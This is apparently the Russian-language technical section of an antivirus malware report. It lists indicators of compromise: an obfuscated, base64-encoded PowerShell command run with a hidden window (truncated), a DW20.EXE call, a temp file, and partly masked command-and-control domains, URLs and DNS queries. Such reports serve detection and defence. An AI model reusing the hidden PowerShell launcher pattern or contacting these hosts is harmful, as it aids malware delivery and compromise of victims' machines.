Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGgAZQBhAHAAbABpAG8AYwBoAGoAbwB1AHEAdQA9ACcAawBlAGkAYwByAGUAZQByAHoAdQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAGMAdQByAGkAVABgAHkAUABgAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2004
- %TEMP%\929672.cvr
- 'di######n.mukomukokab.go.id':80
- 'di######n.mukomukokab.go.id':443
- 'do####iameriky.cz':443
- 'au#####egrowsell.com':443
- http://di######n.mukomukokab.go.id/cgi-bin/onk/
- 'di######n.mukomukokab.go.id':443
- 'do####iameriky.cz':443
- 'au#####egrowsell.com':443
- DNS ASK di######n.mukomukokab.go.id
- DNS ASK do####iameriky.cz
- DNS ASK au#####egrowsell.com
- DNS ASK es####movere.com
- DNS ASK ex######.##lenevetechnologies.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGgAZQBhAHAAbABpAG8AYwBoAGoAbwB1AHEAdQA9ACcAawBlAGkAYwByAGUAZQByAHoAdQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAGMAdQByAGkAVABgAHkAUABgAF...' (со скрытым окном)